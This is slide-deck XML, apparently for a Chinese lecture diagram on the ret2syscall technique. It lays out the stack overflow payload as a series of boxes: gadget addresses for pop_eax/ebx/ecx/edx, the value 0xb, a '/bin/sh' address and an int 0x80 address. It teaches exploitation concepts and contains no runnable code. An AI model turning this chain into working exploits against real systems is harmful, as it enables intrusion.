          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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return address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4403F34D-524A-4A67-8521-81C875F32659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="4586684"/>
            <a:ext cx="2670924" cy="1934766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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6E5396C4-F8ED-4107-8266-1D7885A48E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="3011884"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C964E2-877C-4132-AC90-E433E02ACBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="3405584"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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pop_ebx_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F61C535F-6CFE-419B-962B-C2F3BE7C4AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="3799284"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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0xb</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D32B999C-9F1D-4536-89E3-972E122065E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="4192984"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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pop_eax_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951CE4C9-BF9B-45DC-A8C8-33956207818B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="5251450"/>
            <a:ext cx="2670924" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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970F0A0F-B047-4E18-9915-B81F19176B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="4586684"/>
            <a:ext cx="2670924" cy="664766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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738D9AEA-7B47-4C55-9E79-841CCFBE114B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="1437084"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2FC757D-D5C8-473A-9481-BF108561E891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="1830784"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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pop_edx_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1083524A-D152-4F5E-A4D8-6590B39A3A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="2224484"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B42E4E0-76B9-4E7A-A906-A30E05757E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="2618184"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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pop_ecx_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5FD54C4-F70B-46A2-B829-B7FAB211D4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824038" y="1060052"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCBCB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int 0x80 address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7DB867C-BE74-4C78-BB72-82B45E1EAF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="2224484"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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F2AE09F7-22CB-4AA1-B90D-824764AC9142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="2618184"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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19AF2669-61B0-465A-A8DA-237F6BD6AF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1460301"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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3F55AA98-18FD-470D-A22F-DBC4BA0A7711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1854001"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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CBCADDE8-1B74-4FFF-92DE-6D1F9CB8F979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1070768"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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9B55803E-EB92-4F4B-8A2F-43590F0EA416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="1373584"/>
            <a:ext cx="2670924" cy="4851400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C8E6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4A60232A-F134-4D6D-A545-82B4CEDE2892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2059185"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_edx_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD9935CC-D1AC-40C1-9810-3B7952C7F7C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2815034"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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int 0x80</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="矩形 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78587AA5-84AA-4C29-8991-220EAF893801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="4389834"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_eax_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="矩形 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E184F5E-517C-446E-B688-E4CB8DF4A296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="3755826"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_ebx_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="矩形 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310BA00B-4966-4210-9BAA-4556A13CBE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="5554067"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_ecx_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="箭头: 右 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90682E4E-3467-48F3-A7A8-633024F0800E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3483724" y="3710360"/>
            <a:ext cx="1340314" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>栈溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="箭头: 右 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51724AA6-13F5-4EC1-ADC2-B14D7585C1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494962" y="3725068"/>
            <a:ext cx="1340314" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>跳转执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8875318D-7877-4C4D-AAD2-6303D8558187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1786624" y="720486"/>
            <a:ext cx="723275" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1849A34A-5F8A-42C6-9DDA-B515B19AC645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5734362" y="660747"/>
            <a:ext cx="723275" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本框 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35BA6B5-2F3A-45D2-BEB1-FDBDBF25DD16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9892456" y="660747"/>
            <a:ext cx="556563" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="矩形 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F794532-DA8C-4977-9DEA-1154F955B881}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23309266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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A60232A-F134-4D6D-A545-82B4CEDE2892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2059185"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_edx_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD9935CC-D1AC-40C1-9810-3B7952C7F7C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="2815034"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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int 0x80</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="矩形 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78587AA5-84AA-4C29-8991-220EAF893801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="4389834"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_eax_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="矩形 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E184F5E-517C-446E-B688-E4CB8DF4A296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="3755826"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_ebx_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="矩形 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310BA00B-4966-4210-9BAA-4556A13CBE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8835276" y="5554067"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5CAE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pop_ecx_ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
